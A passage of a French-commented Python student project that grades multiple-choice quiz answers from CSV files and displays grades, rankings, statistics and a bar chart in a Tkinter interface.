['Ada','B','D','B','C','Z','B','Z','A'] ,\r\n ['Hedy','B','D','B','C','Z','B','Z','Z'] ]\r\nlsolution = ['solution','A','A','C','C','C','B','C','D']\r\n\r\ndef corrigeGrille(grillerep,lsol):\r\n \"\"\" Cette fonction corrige une grille(au lieu d'une liste seule)et retourne une grille corrigée avec les points attribués pour chaque 
élève \"\"\"\r\n grille2=[0]*len(grillerep)#J'initialise une liste de la longueur de la grille de réponses\r\n for i in range(len(grillerep)):#Je parcours ma liste\r\n grille2[i]=corrige(grillerep[i],lsol)#J'assigne à l'index de la liste une nouvelle liste pour en faire une grille\r\n #faite à partir de la fonction corrige(à partir de l'index de la grille de réponses, soit la liste de réponse de l'élève,\r\n #et de la liste de solutions) qui retourne la liste des points marqués par question\r\n return grille2# Je retourne la deuxième grille\r\n\r\ng= [ ['Alan', 3,-1,0,3,3,3,0,3] ,\r\n ['Ada', -1,-1,-1,3,0,3,0,-1] ,\r\n ['Hedy', -1,-1,-1,3,0,3,0,0] ]\r\n\r\ndef noteGrille(grillepoints):\r\n \"\"\" Cette fonction additionne une liste à l'intérieur d'une grille de points pour retourner une grille avec la note par élève \"\"\"\r\n grille3=[0]*len(grillepoints)#Je crée une liste de la taille de la grille de points\r\n for x in range(len(grillepoints)):#Je parcours ma liste\r\n grille3[x]=[0]*2#J'insère une liste de deux occurences pour créer une grille\r\n for i in range(len(grillepoints)):#Je parcours ma grille\r\n for j in range(len(grillepoints[i])):\r\n if j==0:#Je mets le prénom en début de grille3[i] car grillepoints[i][0], grillepoints[i][j] dans cette situation, est l'emplacement du prénom de l'élève \r\n grille3[i][0]=grillepoints[i][j]\r\n else:#Je mets la note en deuxième position, note que je calcule avec la fonction note appliquée à la liste grillepoints[i]\r\n grille3[i][1]=note(grillepoints[i])\r\n return grille3 # Je retourne grille 3 soit la grille avec le prénom et la note des élèves\r\n\r\ndef reponseFausseGrille (grillepoints):\r\n \"\"\" Cette fonction renvoie une grille avec les réponses fausses des élèves \"\"\"\r\n grille4=[0]*len(grillepoints)#Je crée une liste de la taille de la grille de points\r\n for i in range(len(grillepoints)):#Je parcours ma liste\r\n grille4[i]=reponseFausse(grillepoints[i])#J'assigne à l'index de la deuxième liste une nouvelle liste pour en faire une grille\r\n #faite à partir de la fonction reponseFausse de l'index de la grille de points\r\n #qui retourne la liste des index de réponses fausses des élèves\r\n return grille4 # Je retourne grille4 soit la grille avec le prénom de l'élève et l'index de ses réponses fausses\r\n\r\ndef somGrille(grillepoints):\r\n \"\"\" Cette fonction additionne le total des points des élèves pour chacune des questions \"\"\"\r\n listeSom=[]#Je crée une liste vide qui contiendra le total des points des élèves\r\n listeSom.append('somme')#J'ajoute somme au début de la liste\r\n sommeGrille=0#J'initialise une variable à zéro\r\n for j in range(1,len(grillepoints[0])):#Je parcours la liste dans la grille, pour traiter la question j, en excluant le prénom et j'utilise la longueur de grillepoints[0] car les listes ont toutes la même longueur\r\n for i in range(len(grillepoints)):#Je parcours ensuite la grille pour lire les points de chaque élève pour cette question\r\n sommeGrille+=grillepoints[i][j]#J'additionne à la variable les points de la question\r\n listeSom.append(sommeGrille)#J'insere mon ajout(sommeGrille) dans la liste que j'avais initialisée au début\r\n sommeGrille=0#Je remets la variable à zéro pour traiter la question suivante \r\n return listeSom # Je retourne la liste\r\n\r\ngrilleNote = [ ['Alan', 14] , ['Ada', 2] , ['Hedy', 3] ]\r\n\r\ndef meilleurResultat(grillerep) :\r\n \"\"\" Cette fonction donne le nom de l'élève avec le meilleur résultat \"\"\"\r\n mr=grillerep[0][0]# J'initialise avec le nom 
du premier élève\r\n mrc=grillerep[0][1]#J'initialise à la note du premier élève\r\n for i in range(1,len(grillerep)):#Je parcours ma grille pour chaque élève excluant le premier\r\n if mrc<grillerep[i][1]:# Si la variable mrc(meilleur résultat chiffre) est inférieure à la note de cet.te élève alors :\r\n mrc=grillerep[i][1]#Je remplace la variable mrc avec la note\r\n mr=grillerep[i][0]# Et je remplace le nom de l'élève ayant eu le meilleur résultat \r\n return mr # A la fin je retourne le nom de l'élève ayant eu la meilleure note\r\n\r\n# partie 3 fichier\r\n# Pensez à mettre reponse.csv et réponseQCM.csv dans le même répertoire que votre programme.\r\nimport csv\r\ndef lireSolutionCSV():\r\n \"\"\" Cette fonction lit le fichier solution et renvoie une liste avec la solution \"\"\"\r\n sol=[]#Je déclare une variable sol qui contiendra la solution des réponses\r\n monFichierSol=open('solution.csv')#J'ouvre mon fichier\r\n contenu=csv.reader(monFichierSol, delimiter=\";\")#Je place le contenu du fichier que je lis dans une variable\r\n for ligne in contenu:#Je parcours le contenu\r\n sol=ligne#Je j'ajoute la l'ensemble des solutions dans sol\r\n monFichierSol.close()#Je ferme mon fichier\r\n return sol # Je retourne une liste avec la solution\r\n\r\ndef lireCSV() :\r\n \"\"\" Cette fonction lit les réponses puis renvoie une grille avec le prénom et les réponses qui se trouvaient dans le fichier \"\"\"\r\n rep=[]#Je déclare une variable rep qui contiendra les réponses des éléves\r\n monFichierRep=open('reponseQCM.csv')#J'ouvre mon fichier\r\n contenu=csv.reader(monFichierRep, delimiter=\";\")#Je place le contenu du fichier que je lis dans une variable\r\n for lignes in contenu:#Je parcours le contenu\r\n rep.append(lignes)#Je j'ajoute toutes les lignes dans rep\r\n monFichierRep.close()#Je ferme mon fichier\r\n return rep # Je retourne le contenu du fichier\r\n\r\ndef ecritureCSV():\r\n \"\"\" Cette fonction écrit dans le fichier noteQCM le prénom et la note de l'élève et retourne la liste avec le prénom et la note de l'élève \"\"\"\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())#J'attribue à la variable \"corriger\" la grille résultant de la fonction corrigeGrille, utilisée sur les données renvoyées par les fonctions lireCSV et lireSolutionCSV, soit une grille corigée\r\n notePrenom=noteGrille(corriger)#Je note ensuite cette grille avec la fonction noteGrille qui me renvoie une grille avec le prénom et la note de chaque élève\r\n monFichierNote=open('noteQCM.csv',\"w\")#J'ouvre en mode écriture mon fichier noteQCM\r\n for i in range(len(notePrenom)):#Je parcours ma liste et j'écris le prénom et la note, séparés d'un point virgule et ensuite j'écris un saut de ligne. 
\r\n monFichierNote.write(str(notePrenom[i][0]))\r\n monFichierNote.write(';')\r\n monFichierNote.write(str(notePrenom[i][1]))\r\n monFichierNote.write('\\n')\r\n monFichierNote.close()#Je ferme mon fichier\r\n return notePrenom# Je retourne la liste des notes\r\n\r\n#partie4 Tkinter\r\n\r\ndef Accueil():\r\n \"\"\"\" Cette fonction permet d'afficher l'accueil \"\"\"\r\n Detruire()#Je désaffiche les widgets à l'écran avec la fonction détruire, ce que je ferais pour chacune des fonction suivantes\r\n\r\n Label1.config(text=\"Accueil\",font=('System', '40', 'italic bold'),width='15')#Je configure le label1 pour qu'il affiche \"Accueil\" en police de caractère system, taille 40, et en italic gras avec une taille de 15 caractères\r\n\r\n Label1.grid(column=2,row=1,padx=20, pady=20)#Je l'affiche.\r\n\r\n Entree.config(font=('System', '1'))\r\n Entree2.config(font=('System', '1'))#Je configure la police de caractères des zones de saisie et des boutons\r\n\r\n Bouton.config(font=('System', '1'))\r\n Bouton2.config(font=('System', '1'))\r\n \r\n Entree.grid(column=0,row=2,padx=20, pady=20)# Je les affiche\r\n Bouton.grid(column=1, row=2, padx=20, pady=20)\r\n\r\n Entree2.grid(column=0,row=3, padx=20, pady=20)\r\n Bouton2.grid(column=1, row=3, padx=20, pady=20)\r\n return\r\n\r\ndef VoirNotesEleves():\r\n \"\"\" Cette fonction permet d'afficher les notes des élèves \"\"\"\r\n Detruire()\r\n Canevas.delete(ALL)#J'efface ce qu'il y avait sur les canvas\r\n Canevas2.delete(ALL)\r\n Canevas3.delete(ALL)\r\n VoirNotesEleves1()#J'appelle les trois fonctions décrites plus bas\r\n VoirNotesEleves2()\r\n VoirNotesEleves3()\r\n return\r\n\r\ndef VoirNotesEleves1():\r\n \"\"\" Cette fonction permet d'afficher les notes dans l'ordre alphabétique \"\"\"\r\n Label1.config(text=\"Les notes et prénoms triés selon l'ordre alphabétique\",font=('System', '1'), width='45')#Je configure mon label et je l'affiche\r\n Label1.grid(column=0,row=1)\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())#Je fais la même chose que dans ecritureCSV pour avoir une grille de notes et prénoms \r\n Notes=noteGrille(corriger)\r\n Canevas.config(width=((fen.winfo_width())/3)-5, height=fen.winfo_height(),scrollregion=(0, 0,(len(Notes)*15)+100 , (len(Notes)*15)+100))#Je configure la taille de mon Canevas et la zone de déplacement pour la barre \r\n Canevas.grid(column=0,row=2,padx=1, pady=2)#J'affiche mon Canevas\r\n for i in range(len(Notes)):\r\n Canevas.create_text(35,(3+i)*15, text=Notes[i][0], justify='left', anchor='sw',font=('System', '1'))#J'affiche le prénom, puis :, puis la note dans le Canevas\r\n Canevas.create_text(120,(3+i)*15, text=\":\", justify='left', anchor='sw',font=('System', '1'))\r\n Canevas.create_text(165,(3+i)*15, text=Notes[i][1], justify='left', anchor='sw',font=('System', '1'))\r\n BarreDefil.config(orient='vertical', command=Canevas.yview)#Je configure ma barre de défilement en l'orientant verticalement et je lui attribue les ordonnées du Canvas pour qu'elle puisse les faire défiler\r\n BarreDefil.grid(column=1, row=2, sticky='ns')#Je l'affiche\r\n Canevas['yscrollcommand'] = BarreDefil.set#J'attribue à la commande yscrool du Canevas la barre de défilement pour lui permettre de défiler\r\n return\r\n\r\ndef VoirNotesEleves2():\r\n \"\"\" Cette fonction permet d'afficher les note dans l'ordre décroissant, elle est globalement pareil à la première sauf sur un point \"\"\"\r\n Label2.config(text=\"Les notes et prénoms triés selon l'ordre decroissant des notes\",font=('System', '1'))\r\n 
Label2.grid(column=2,row=1)\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())\r\n Notes=noteGrille(corriger)\r\n Notes.sort(key=op.itemgetter(1), reverse=True)# Je trie ma grille selon la deuxième occurence de la liste à l'intérieur de la grille(la note) grace à la fonction itemgetter d'operator puis j'inverse la grille, soit l'ordre décroissant des notes\r\n Canevas2.config(width=fen.winfo_width()/3-5, height=fen.winfo_height(),scrollregion=(0, 0,(len(Notes)*15)+100 , (len(Notes)*15)+100))\r\n Canevas2.grid(column=2,row=2,padx=1, pady=2)\r\n for i in range(len(Notes)):\r\n Canevas2.create_text(35,(3+i)*15, text=Notes[i][0], justify='left', anchor='sw',font=('System', '1'))\r\n Canevas2.create_text(120,(3+i)*15, text=\":\", justify='left', anchor='sw',font=('System', '1'))\r\n Canevas2.create_text(165,(3+i)*15, text=Notes[i][1], justify='left', anchor='sw',font=('System', '1'))\r\n BarreDefil2.config(orient='vertical', command=Canevas2.yview)\r\n BarreDefil2.grid(column=3, row=2, sticky='ns')\r\n Canevas2['yscrollcommand'] = BarreDefil2.set\r\n return\r\n\r\ndef VoirNotesEleves3():\r\n \"\"\" Cette fonction permet d'afficher les note dans l'ordre croissant, elle est globalement pareil à la première sauf sur un point \"\"\"\r\n Label3.config(text=\"Les notes et prénoms triés selon l'ordre croissant des notes\",font=('System', '1'))\r\n Label3.grid(column=4,row=1)\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())\r\n Notes=noteGrille(corriger)\r\n Notes.sort(key=op.itemgetter(1))# Je trie ma grille selon la deuxième occurence(la note) grace à la fonction itemgetter d'operator soit dans l'ordre croissant des notes\r\n Canevas3.config(width=((fen.winfo_width())/3)-75, height=fen.winfo_height(),scrollregion=(0, 0,(len(Notes)*15)+100 , (len(Notes)*15)+100))\r\n Canevas3.grid(column=4,row=2,padx=1, pady=2)\r\n for i in range(len(Notes)):\r\n Canevas3.create_text(35,(3+i)*15, text=Notes[i][0], justify='left', anchor='sw',font=('System', '1'))\r\n Canevas3.create_text(120,(3+i)*15, text=\":\", justify='left', anchor='sw',font=('System', '1'))\r\n Canevas3.create_text(165,(3+i)*15, text=Notes[i][1], justify='left', anchor='sw',font=('System', '1'))\r\n BarreDefil3.config(orient='vertical', command=Canevas3.yview)\r\n BarreDefil3.grid(column=5, row=2, sticky='ns')\r\n Canevas3['yscrollcommand'] = BarreDefil3.set\r\n return\r\n\r\ndef EleveMeilleur():\r\n \"\"\" Cette fonction permet de savoir le meilleur élève ainsi que sa note \"\"\"\r\n Detruire()\r\n Canevas.delete(ALL)#J'efface le contenu de Canevas\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())\r\n Notes=noteGrille(corriger)\r\n Notes.sort(key=op.itemgetter(1),reverse=True)#Je vais la même chose que dans VoirNotesEleves2 pour avoir la note correspondante au meilleur résultat\r\n meilleurEleve=meilleurResultat(Notes)#J'utilise la fonction meilleurResultat pour déterminer le nom de l'élève ayant eut le meilleur résultat\r\n Canevas.config(width=fen.winfo_width(), height=fen.winfo_height())#Je configure mon Canevas pour lui donner la taille de la fenêtre\r\n Canevas.grid(column=0,row=1)#J'affiche mon Canevas\r\n Canevas.create_text(fen.winfo_width()/2,fen.winfo_height()/2, text=\"Bravo à : \"+str(meilleurEleve)+\" qui a obtenu une note de : \"+str(Notes[0][1]), font=('System', '40', 'italic bold'), fill='orange')\r\n #J'écris dans le Canevas une chaine caractère comprenant le nom de l'élève et sa note qui est la seconde occurence du début de la liste triée selon l'ordre décroissant de la note\r\n return\r\n\r\ndef 
ElevePire():\r\n \"\"\" Cette fonction permet de savoir quel élève a eut le moins bon score et sa note, elle est globalement semblable à EleveMeilleur mais possède certaines différences \"\"\"\r\n Detruire()\r\n Canevas.delete(ALL)#J'efface le contenu de Canevas\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())\r\n Notes=noteGrille(corriger)\r\n Notes.sort(key=op.itemgetter(1))#Je fais la même chose que dans VoirNotesEleves3 pour avoir la note et le prénom correspondante au pire résultat\r\n pireEleve=Notes[0][0]#J'attribue le prénom de l'élève ayant le pire résultat qui est la première occurence de la liste croissante de notes\r\n Canevas.config(width=fen.winfo_width(), height=fen.winfo_height())\r\n Canevas.grid(column=0,row=1)\r\n Canevas.create_text(fen.winfo_width()/2,fen.winfo_height()/2, text=str(pireEleve)+\" a obtenu une note de : \"+str(Notes[0][1]), font=('System', '40','italic bold'), fill='blue')\r\n #J'écris dans le Canevas une chaine caractère comprenant le nom de l'élève et sa note qui est la seconde occurence du début de la liste triée selon l'ordre croissant de la note\r\n return\r\n\r\ndef VoirReponsesEleves():\r\n \"\"\" Cette fonction permet de voir les réponses proposées par les élèves \"\"\"\r\n Detruire()\r\n Canevas.delete(ALL)\r\n Label3.config(text=\"Les réponses des élèves\",font=('System', '1'))\r\n Label3.grid(column=2,row=1)\r\n Reponse=lireCSV()#J'utilise lireCSV pour avoir une grille avec les prénoms et les réponses des élèves\r\n Canevas.config(width=((fen.winfo_width())/2), height=fen.winfo_height(),scrollregion=(0, 0,(len(Reponse)*15)+100 , (len(Reponse)*15)+100))\r\n Canevas.grid(column=2,row=2,padx=20, pady=2)\r\n for i in range(len(Reponse)):#Je parcours ma grille\r\n Canevas.create_text(35,(3+i)*15, text=Reponse[i][0], justify='left', anchor='sw',font=('System', '1'))#Je mets en premier le prénom de l'élève, qui n'occura qu'une fois par parcours de grille\r\n Canevas.create_text(120,(3+i)*15, text=\":\", justify='left', anchor='sw',font=('System', '1'))#Je mets le : pour séparer les réponses du prénom de l'élève\r\n for j in range(1,len(Reponse[i])):#Je parcours le reste des réponses en excluant le prénom\r\n Canevas.create_text(120+10*j,(3+i)*15, text=Reponse[i][j], justify='left', anchor='sw',font=('System', '1'))#J'écris les réponses des élèves dans le Canevas\r\n BarreDefil.config(orient='vertical', command=Canevas.yview)\r\n BarreDefil.grid(column=3, row=2, sticky='ns')\r\n Canevas['yscrollcommand'] = BarreDefil.set\r\n return\r\n\r\ndef VoirReponsesFausses():\r\n \"\"\" Cette focntion permet de voir les numéros des questions auxquelles les élèves ont répondu faux, elle est semblable dans la forme à la fonction précedente \"\"\"\r\n Detruire()\r\n Canevas.delete(ALL)\r\n Label3.config(text=\"Les réponses fausses des élèves\")\r\n Label3.grid(column=1,row=1)\r\n ReponseFausse=corrigeGrille(lireCSV(),lireSolutionCSV())#Je fais la même chose que dans ecritureCSV pour avoir une grille de notes et prénoms \r\n ReponseFausse=reponseFausseGrille(ReponseFausse)#J'utlise la fonction reponseFausseGrille sur ma grille pour avoir l'index des réponses fausses\r\n Canevas.config(width=((fen.winfo_width())/2), height=fen.winfo_height(),scrollregion=(0, 0,(len(ReponseFausse)*15)+100 , (len(ReponseFausse)*15)+100))\r\n Canevas.grid(column=1,row=2,padx=20, pady=2)\r\n for i in range(len(ReponseFausse)):\r\n Canevas.create_text(35,(3+i)*15, text=ReponseFausse[i][0], justify='left', anchor='sw',font=('System', '1'))#Cette partie est similaire à la fonction du 
dessus à part que ceux sont l'index des réponses fausses qui sont mises et non les réponses des élèves\r\n Canevas.create_text(120,(3+i)*15, text=\":\", justify='left', anchor='sw',font=('System', '1'))\r\n for j in range(1,len(ReponseFausse[i])):\r\n Canevas.create_text(120+10*j,(3+i)*15, text=ReponseFausse[i][j], justify='left', anchor='sw',font=('System', '1'))\r\n BarreDefil.config(orient='vertical', command=Canevas.yview)\r\n BarreDefil.grid(column=2, row=2, sticky='ns')\r\n Canevas['yscrollcommand'] = BarreDefil.set\r\n return\r\n\r\ndef VoirReponsesOrdreReusite():\r\n \"\"\" Cette fonction permet de voir l'ordre de réussite des question du questionnaire \"\"\"\r\n Detruire()\r\n Canevas.delete(ALL)\r\n ReponseFausse=corrigeGrille(lireCSV(),lireSolutionCSV())#Je fais la même chose que dans ecritureCSV pour avoir une grille de notes et prénoms \r\n OrdreReusite=somGrille(ReponseFausse)#J'additionne les points des eleves grace à la fonction somGrille\r\n for i in range(len(OrdreReusite)):#Je parcours ma liste\r\n if i!=0:#J'exclue somme\r\n OrdreReusite[i]=[i,int(OrdreReusite[i])]#Je met le numero des questions devant les resultats de somGrille\r\n OrdreReusite.remove('somme')#J'enlève somme\r\n OrdreReusite.sort(key=op.itemgetter(1))#Je trie ma grille selon la deuxième occurence\r\n Canevas.create_text(20,fen.winfo_height()/2, text=\"Les questions des moins au plus réussies : \", justify='left', anchor='sw',font=('System', '25'))\r\n for i in range(len(OrdreReusite)):#Je parcours ma grille\r\n Canevas.create_text(fen.winfo_width()/2-75+i*70,fen.winfo_height()/2, text=str(OrdreReusite[i][0])+\"|\", justify='left', anchor='sw',font=('System', '27'))#Je mets les question des moins au plus réussies\r\n Canevas.config(height=fen.winfo_height(),width=fen.winfo_width())\r\n Canevas.grid(column=0, row=1)\r\n return\r\n\r\ndef VoirSolution():\r\n \"\"\" Cette fonction permet de voir la solution des questions du questionnaire \"\"\"\r\n Detruire()\r\n Canevas.delete(ALL)\r\n Label3.config(text=\"La solution\")\r\n Label3.grid(column=1,row=1)\r\n Solution1=lireSolutionCSV()#Je recupère une liste Solution1 grace à la fonction lireSolutionCSV\r\n Solution1.insert(1,':')#J'insert un : à la deuxième occurence, soit juste après \"solution\"\r\n Solution1=\" \".join(Solution1)#Je transforme ma liste en chaine de caractères séparés par un espace\r\n Canevas.config(width=fen.winfo_width(), height=fen.winfo_height())\r\n Canevas.grid(column=0,row=1)\r\n Canevas.create_text(fen.winfo_width()/2,fen.winfo_height()/2, text=str(Solution1), font=('System', 30))#J'affiche ma chaine de caractère sur le Canevas\r\n return\r\n\r\ndef rechercher():\r\n \"\"\"Cette fonction permet de rechercher la note avec le prénom d'un élève\"\"\"\r\n Canevas.delete(ALL)\r\n Canevas.config(width=fen.winfo_width()/2, height=fen.winfo_height()/4)\r\n Canevas.grid(column=2,row=2,padx=20, pady=20)\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())\r\n longueur=noteGrille(corriger)#Je fais la même chose que dans ecritureCSV pour avoir une grille de notes et prénoms \r\n for i in range(len(longueur)):#Je parcours ma grille\r\n if longueur[i][0]==recherche.get():#Si le prénom, soit la première ocurence de la liste dans la grille, est le même que celui recherché alors j'affiche le prénom et la note soit la deuxième occurence \r\n Canevas.create_text(fen.winfo_width()/4,fen.winfo_height()/8,text=str(longueur[i][0])+' a une note de '+str(longueur[i][1]),font=('System', 30))\r\n return#Je ferme la fonction\r\n 
Canevas.create_text(fen.winfo_width()/4,fen.winfo_height()/8,text=recherche.get()+' n\\'existe pas',font=('System', 30))#Sinon si il n'y a pas de prénom correspondant je dis que le prénom n'existe pas\r\n return\r\n\r\ndef rechercher2():\r\n \"\"\"Cette fonction permet de rechercher les prénoms d'élèves à partir de la note\"\"\"\r\n Canevas2.delete(ALL)\r\n nombre=0#J'initialise une variable nombre à zéro\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())\r\n longueur=noteGrille(corriger)#Je fais la même chose que dans ecritureCSV pour avoir une grille de notes et prénoms \r\n for i in range(len(longueur)):#Je parcours ma grille\r\n if str(longueur[i][1])==recherche2.get():#Si la deuxième occurence soit la note est égale à la note recherchée alors j'affiche les prénoms liés à cette note\r\n Canevas2.create_text(fen.winfo_width()/4,(nombre+3)*15,text=str(longueur[i][0]), justify='left', anchor='sw',font=('System', '1'))\r\n nombre=nombre+1#J'additionne un à \"nombre\" pour que ce dernier soit au dessus de zéro, cela me renseigne si il y a bien une occurence au moins, je compte aussi ainsi le nombre d'élèves\r\n if nombre==0:#Si il n'y pas d'occurence, je dis que la note n'existe pas\r\n Canevas2.create_text(fen.winfo_width()/4,fen.winfo_height()/8,text='Cette note n\\'existe pas',font=('System', 30))\r\n else:#Sinon je dis le nombre d'élève ayant eu cette note\r\n Canevas2.create_text(fen.winfo_width()/6,45,text=str(nombre)+' élèves ont une note de '+str(recherche2.get())+ \" : \" ,font=('System', 10))\r\n BarreDefil2.config(orient='vertical', command=Canevas2.yview)\r\n BarreDefil2.grid(column=3, row=3, sticky='ns')\r\n Canevas2['yscrollcommand'] = BarreDefil2.set\r\n\r\n Canevas2.config(width=fen.winfo_width()/2, height=fen.winfo_height()/4,scrollregion=(0, 0,(nombre*15)+100 , (nombre*15)+100))\r\n Canevas2.grid(column=2,row=3,padx=20, pady=20)\r\n return\r\n\r\ndef VoirStatistiques():\r\n \"\"\" Cette fonction permet de connaitre la moyenne et l'écart type des notes du questionnaire \"\"\"\r\n Detruire()\r\n Canevas.delete(ALL)\r\n Canevas2.delete(ALL)\r\n moyenne=0#J'initialise mes deux variable à zéro\r\n ecarttype=0\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())\r\n listeNotesEleves=noteGrille(corriger)#Je fais la même chose que dans ecritureCSV pour avoir une grille de notes et prénoms \r\n longueur1=len(listeNotesEleves)#Je crée une variable longueur pour ne par avoir à écrire len(listeNotesEleves)\r\n for i in range(longueur1):#Je parcours ma liste\r\n moyenne+=listeNotesEleves[i][1]#J'ajoute la note des élèves à \"moyenne\" pour avoir le total des notes\r\n moyenne/=longueur1#Je divise ce total des notes stocké dans \"moyenne\" par \"longueur\" pour obtenir la moyenne\r\n for i in range(longueur1):#Je parcours ma liste\r\n ecarttype+=((listeNotesEleves[i][1]-moyenne)*(listeNotesEleves[i][1]-moyenne))#J'applique la formule de la variance qui est (x-moyenne)^2 divisée par longueur1 soit grand N\r\n ecarttype/=longueur1\r\n ecarttype=math.sqrt(ecarttype)#Pour trouver l'écart type j'utilise la fonction sqrt de math soit racine carrée sur la variance\r\n\r\n Canevas.config(height=fen.winfo_height()/2,width=fen.winfo_width())\r\n\r\n Canevas2.config(height=fen.winfo_height()/2,width=fen.winfo_width())\r\n\r\n Canevas.grid(row=1,column=1,padx=10, pady=2)\r\n Canevas.create_text(fen.winfo_width()/3,fen.winfo_height()/4,text='La moyenne de la classe est de '+str(\"{:.2f}\".format(moyenne)), font=('System',30))#J'utilise format pour n'afficher que deux chiffres après la 
virgule\r\n Canevas2.grid(row=2,column=1,padx=10, pady=2)\r\n Canevas2.create_text(fen.winfo_width()/3,fen.winfo_height()/4,text='L\\'écart type de la classe est de '+str(\"{:.2f}\".format(ecarttype)), font=('System',30))\r\n \r\n return\r\n\r\ndef VoirGraphiqueBaton():\r\n \"\"\" Cette fonction permet d'afficher un graphique en baton des notes du questionnaire\"\"\"\r\n Detruire()\r\n Canevas.delete(ALL)\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())#Je fais la même chose que dans ecritureCSV pour avoir une grille de notes et prénoms \r\n listeNotesEleves=noteGrille(corriger)\r\n listeNotesEleves.sort(key=op.itemgetter(1))#Je trie selon l'ordre croissant des notes\r\n longueur1=len(listeNotesEleves)\r\n listeNotes1=[]#J'initialise 2 listes vides, la première me servira à avoir toutes les différentes notes qu'ont eut les élèves, la deuxième me servira à compter le nombre d'élèves pour chacune de ces notes\r\n listeNombre=[]\r\n x=0#J'initialise 1 variable, l'index, à zéro\r\n listeNotes1.append(listeNotesEleves[0][1])#J'initialise la liste des notes par la valeur la plus basse(1ère de la liste car triée par ordre croissant) \r\n listeNombre.append(1)#J'initialise le compteur du nombre d'élèves à un\r\n for i in range(longueur1):#Je parcours ma liste\r\n if listeNotes1[x]!=listeNotesEleves[i][1]:# Si la note d'un élève n'est plus égale à la note stockée dans listeNotes1 alors\r\n listeNotes1.append(listeNotesEleves[i][1])#je rajoute cette note à listeNotes1\r\n listeNombre.append(1)#Je réinitialise le compteur du nombre d'élèves à un pour chacune des notes\r\n x+=1#en incrémentant l'index\r\n else:\r\n listeNombre[x]+=1#Sinon j'incrémente le compteur du nombre d'élèves de un pour cette note\r\n Canevas.create_line(325,fen.winfo_height()-50,325,(fen.winfo_height()-50)-max(listeNombre)*1.5, fill='black')#Je crée les axes de légende\r\n for i in range(len(listeNombre)):#Je parcours la liste de nombres d'élèves ayant eu une note\r\n Canevas.create_rectangle((i*20)+325,fen.winfo_height()-50,((i+1)*20)+325,(fen.winfo_height()-50)-listeNombre[i]*1.5, outline='black')#Je crée les rectangles du diagramme en batons\r\n Canevas.create_text((i*20)+333,fen.winfo_height()-15, text= str(listeNotes1[i]))#J'écris les légendes horizontales\r\n Canevas.create_text(310,(fen.winfo_height()-50)-listeNombre[i]*1.5, text=str(listeNombre[i]),font=('Helvetica',5))#J'écris les légendes verticales\r\n Canevas.config(height=fen.winfo_height(), width=fen.winfo_width())\r\n Canevas.grid(row=1,column=0,padx=20)\r\n return\r\n\r\ndef VoirPourcentages():\r\n \"\"\" Cette fonction permet d'afficher l'accueil pour les pourcentages \"\"\"\r\n Detruire()\r\n\r\n Canevas.delete(ALL)\r\n Canevas2.delete(ALL)\r\n Canevas3.delete(ALL)\r\n\r\n Entree2.config(font=('System',15))\r\n Bouton3.config(font=('System',15))\r\n \r\n Entree2.grid(column=0, row=1, padx=10, pady=10)\r\n Bouton3.grid(column=1, row=1,padx=10, pady=10)\r\n return\r\n\r\n\r\ndef VoirPourcentage():\r\n \"\"\"Cette fonction permet de calculer les pourcentages d'élève, en dessous, au dessus et égale à une note\"\"\"\r\n nombre=0\r\n nombre2=0\r\n nombre3=0#J'initialise mes trois variables, qui vont contenir le nombre de notes au dessus, dessous et égale à la note recherchée, à zéro\r\n\r\n pourcentage1=0#J'initialise mes trois variables qui vont contenir les pourcentages à zéro \r\n pourcentage2=0\r\n pourcentage3=0\r\n \r\n Canevas.delete(ALL)\r\n Canevas2.delete(ALL)\r\n Canevas3.delete(ALL)#J'efface le contenu des Canevas\r\n 
corriger=corrigeGrille(lireCSV(),lireSolutionCSV())\r\n longueur=noteGrille(corriger)#Je fais la même chose que dans ecritureCSV pour avoir une grille de notes et prénoms \r\n if recherche2.get().isdigit()==False:# Si la saisie n'est pas un nombre alors je la compte comme une recherche fausse\r\n pourcentage2=100\r\n pourcentage1=0\r\n else:#Sinon je parcours ma grille\r\n for i in range(len(longueur)):\r\n if int(longueur[i][1])>int(recherche2.get()):# Si ma note est supérieure à celle recherchée alors j'incrémente nombre\r\n nombre=nombre+1\r\n elif int(longueur[i][1])<int(recherche2.get()):# Si ma note est inférieure à celle recherchée alors j'incrémente nombre2\r\n nombre2=nombre2+1\r\n elif int(longueur[i][1])==int(recherche2.get()):# Si ma note est égale à celle recherchée alors j'incrémente nombre3\r\n nombre3=nombre3+1\r\n pourcentage1=(nombre/len(longueur))*100# Je calcule les pourcentages en fonction des nombres\r\n pourcentage2=(nombre2/len(longueur))*100\r\n pourcentage3=(nombre3/len(longueur))*100\r\n\r\n if (pourcentage2==100 and pourcentage1==0)or(pourcentage2==0 and pourcentage1==100):# Si un des poucentages est égal à 100% tandis que celui opposée est égal à 0% alors cela veut dire que la note demandée n'est soit qu'inférieur ou supérieur à une note possible, la rendant inexistante \r\n Canevas.config(width=fen.winfo_width(), height=fen.winfo_height()/2)\r\n Canevas3.grid_forget()\r\n Canevas2.grid_forget()\r\n Canevas.create_text(fen.winfo_width()/4+35,fen.winfo_height()/4,text=\"Cette note n'est pas comprise dans l'intervalle des notes\", font=('System',20) )\r\n Canevas.grid(column=2, row=1 ,columnspan=4,padx=20, pady=0)\r\n else:#Sinon j'affiche les trois pourcentages arrondi au deuxième chiffre après la virgule avec format\r\n Canevas.config(width=fen.winfo_width()/2, height=fen.winfo_height()/3)\r\n Canevas2.config(width=fen.winfo_width()/2, height=fen.winfo_height()/3)\r\n Canevas3.config(width=fen.winfo_width()/2, height=fen.winfo_height()/3)\r\n\r\n Canevas.create_text(fen.winfo_width()/4,fen.winfo_height()/8,text=\"Le pourcentage d'élèves ayant une note supérieure à la note rentrée est de \"+str(\"{:.2f}\".format(pourcentage1))+\"%\",font=('System', '16'))\r\n\r\n Canevas2.create_text(fen.winfo_width()/4,fen.winfo_height()/8,text=\"Le pourcentage d'élèves ayant une note inférieure à la note rentrée est de \"+str(\"{:.2f}\".format(pourcentage2))+\"%\",font=('System', '16'))\r\n\r\n Canevas3.create_text(fen.winfo_width()/4,fen.winfo_height()/8,text=\"Le pourcentage d'élèves ayant une note égale à la note rentrée est de 